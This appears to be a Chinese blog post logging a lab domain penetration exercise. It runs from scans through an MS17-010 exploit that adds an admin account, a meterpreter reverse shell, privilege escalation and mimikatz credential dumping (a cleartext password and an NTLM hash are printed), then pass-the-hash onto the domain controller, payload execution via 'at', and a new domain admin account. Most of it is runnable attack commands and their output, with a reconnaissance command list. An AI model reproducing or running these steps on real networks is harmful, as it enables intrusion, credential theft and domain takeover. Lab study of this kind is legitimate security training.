记一次域渗透学习

摸鱼一小会儿

工作摸鱼会不会被打死
继续浪(^▽^)
记录学习域渗透的过程
感谢@klion提供环境

IP地址收集

使用

1
arp-scan -l

或者msf5中的

1
arp_sweep

1.png

ms17_010

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
root@kali:~# nmap -sV -sC 192.168.3.30
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-30 22:22 EDT
Nmap scan report for 192.168.3.30
Host is up (0.000046s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: \xBD\xA8\xC9\xE8\xD6\xD0
| http-webdav-scan:
| Server Type: Microsoft-IIS/6.0
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| WebDAV type: Unknown
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|_ Server Date: Thu, 31 Oct 2019 02:22:44 GMT


点击查看更多
1
2
3
4
5
6
7
8
9
10
11
12
13
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2003 R2 3790 Service Pack 2 microsoft-ds
1031/tcp open msrpc Microsoft Windows RPC
1433/tcp open ms-sql-s Microsoft SQL Server 2005 9.00.1399.00; RTM
| ms-sql-ntlm-info:
|_ Product_Version: 5.2.3790
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2019-10-29T15:29:28
|_Not valid after: 2049-10-29T15:29:28
|_ssl-date: 2019-10-31T02:23:35+00:00; 0s from scanner time.
2383/tcp open ms-olap4?
3389/tcp open ms-wbt-server Microsoft Terminal Service

使用admin/smb/ms17_010_command模块
当前权限system
创建一个账户直接登录

1
2
msf5 auxiliary(admin/smb/ms17_010_command) > set command net user test abc123!@# /add
msf5 auxiliary(admin/smb/ms17_010_command) > set COMMAND net localgroup administrators test /add

3.png
开个http服务将免杀马下载下来

1
λ python2 -m "SimpleHTTPServer"

1
2
3
4
5
6
7
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.3.128
msf5 exploit(multi/handler) > set LHOST 4444
msf5 exploit(multi/handler) > exploit
meterpreter > getuid
Server username: FILESERV\test
1
ipconfig /all

4.png
发现域god.org
5.png
fileadmin用户一枚
enen,win2003 R2直接getsystem

1
2
3
4
5
6
meterpreter > getsystem
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load mimikatz
meterpreter > load mimikatz
meterpreter > kerberos

6.png
读出一个域用户fileadmin:Admin12345
6.png
获取域控制器IP
8.png

1
2
3
dsquery server
"CN=OWA2010CN-GOD,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=god,DC=org"
ping OWA2010CN-GOD

9.png
IP:192.168.3.21

记录常用信息收集命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
echo %PROCESSOR_ARCHITECTURE% //查看系统版本位数
netstat -ano #查看开放的端口
net config Workstation #当前计算机名,全名,用户名,系统版本,工作站域,登陆域
net user /domain b404 pass #修改域内用户密码,需要管理员权限
tasklist /S IP地址 /U 域名\用户名 /P /V #查看远程计算机进程
tasklist /svc #查看进程
taskkill /im 进程名称(cmd.exe) #结束进程
taskkill /pid[进程码] #-t(结束该进程) -f(强制结束该进程以及所有子进程)
ipconfig /all #用来查看当前机器的网络环境,判断是工作组,还是域环境.网段是怎么划分的,每个段有多少台机器,DNS服务器IP是多少。
net view #用来查看跟本机有关联的机器名.注意,是跟本机有关联的机器,而不是一个段的机器.
net view /domain #用来查看当前网络环境存在几个域.
net view /domain:xxxx #查看xxx域中存在的跟本机有关联的机器.
net group "domain admins" /domain #查看域内管理员.
net user /domain #查看域内的用户名.
net group "domain computers" /domain #查看域内所有机器名.
net time /domain #查看域时间及域服务器的名字
Nslookup -type=SRV _ldap._tcp. #查询DNS
netstat #查看连接信息.
net group "Domain Controllers" /domain #查找域控
nbtstat #由IP地址得到机器名
for /l %i in (1,1,255) do @ping 192.168.3.%i -w 1 -n 1 | find /i"ttl" #ping 扫描

10.png
由Jirairya整理的域渗透知识点

1
2
3
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 1
msf5 post(multi/recon/local_exploit_suggester) > exploit

11.png
运气不错,ms10_015可以用

1
2
meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM

p-t-h

pass-the-hash
简单载入mimikatz.exe

1
2
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

13.png

1
mimikatz # sekurlsa::pth /user:fileadmin /domain:OWA2010CN-God.god.org /ntlm:ccef208c6485269c20db2cad21734fe7

14.png

1
dir /od /b \\OWA2010CN-God.god.org\C$\Users\Administrator\Desktop

15.png

1
2
3
cp msf2.exe \\OWA2010CN-God.god.org\C$\Users\Administrator\Desktop\msf2.exe
net time \\OWA2010CN-God.god.org
at \\OWA2010CN-God.god.org 10:18:00 C:\Users\Administrator\Desktop\msf2.exe #schtasks/at

16.png
直接就是SYSTEM权限

1
2
3
4
5
6
7
8
9
10
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : OWA2010CN-GOD
OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : GOD
Logged On Users : 2
Meterpreter : x86/windows

读不出来密码
17.png
出现这种问题是补丁或者版本太高(听师傅说的)
加域管理

1
2
net user test abc123!@# /add /domain
net localgroup administrators test /add /domain

mimikatz

上猕猴桃(mimikatz)

1
2
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

18.png
登录
19.png

到此结束

如有错误请联系lanbaidetanlang@qq.com

文章目录
  1. 1. 摸鱼一小会儿
  2. 2. IP地址收集
    1. 2.1. ms17_010
    2. 2.2. 记录常用信息收集命令
      1. 2.2.1. p-t-h
      2. 2.2.2. mimikatz
  3. 3. 到此结束